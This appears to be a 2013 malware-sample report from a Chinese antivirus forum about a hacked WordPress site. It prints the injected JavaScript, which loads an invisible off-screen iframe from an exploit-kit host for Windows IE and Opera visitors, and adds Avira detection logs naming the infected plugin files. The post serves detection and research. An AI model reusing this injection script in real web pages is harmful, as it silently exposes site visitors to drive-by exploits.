查看: 1277|回复: 0
收起左侧

[已鉴定] http://rumbalatinanyc.com/members/bradsmith5897

[复制链接]
fireold
发表于 2013-11-28 19:40:13 | 显示全部楼层 |阅读模式
  1. function gra(a, b) {
  2.     return Math.floor(Math.random() * (b - a + 1)) + a;
  3. }

  4. function rs() {
  5.     return Math.random().toString(36).substring(5);
  6. }
  7. if (navigator.cookieEnabled && document.cookie.indexOf('testcookie1=') == -1) {
  8.     var stnm = rs();
  9.     var ua = navigator.userAgent;
  10.     var url = document.location.href;
  11.     if (url.indexOf('admin') == -1 && ua.indexOf('Windows') != -1 && (ua.indexOf('MSIE') != -1 || ua.indexOf('Opera') != -1)) {
  12.         document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="http://globalmsn.org/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');
  13.     }
  14.     var exp = new Date();
  15.     exp.setDate(exp.getDate() + 7);
  16.     document.cookie = 'testcookie1=' + rs() + '; expires=' + exp.toGMTString();
  17. }
复制代码


Avira
2013/11/28 下午 07:36 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MDC6X2XG\jquery[6].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]
      已採取動作:
      檔案會移動至 '4d09a9e3.qua' 名稱底下的隔離區目錄。.

2013/11/28 下午 07:36 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\jquery.form[2].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]
      已採取動作:
      檔案會移動至 '559e8644.qua' 名稱底下的隔離區目錄。.

2013/11/28 下午 07:36 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        817
      目錄數:        0
      惡意程式碼數:        3
      警告數:        0

2013/11/28 下午 07:36 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\swfobject[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]
      已採取動作:
      檔案會移動至 '1ea7f311.qua' 名稱底下的隔離區目錄。.

2013/11/28 下午 07:35 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6TI8XMAJ\widget-members[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.W.106 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/28 下午 07:35 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\global[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.W.106 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/28 下午 07:35 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\VUGD722P\scripts[2].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.W.106 [virus]'
      執行的動作:傳輸至掃描程式

2013/11/28 下午 07:35 [Web Protection] 發現惡意程式碼
      從 URL
      "http://rumbalatinanyc.com/wp-content/plugins/buddypress/bp-themes/bp-default/_i
      nc/global.js?ver=3.0.5" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]。
      已採取動作:已略過

2013/11/28 下午 07:35 [Web Protection] 發現惡意程式碼
      從 URL
      "http://rumbalatinanyc.com/wp-content/plugins/buddypress/bp-core/js/widget-membe
      rs.js?ver=3.0.5" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]。
      已採取動作:已略過

2013/11/28 下午 07:35 [Web Protection] 發現惡意程式碼
      從 URL
      "http://rumbalatinanyc.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.
      3" 存取資料時,
      發現病毒或有害的程式 'JS/BlacoleRef.W.106' [virus]。
      已採取動作:已略過


av1.jpg



fs is
fs1.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:50 , Processed in 0.142882 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表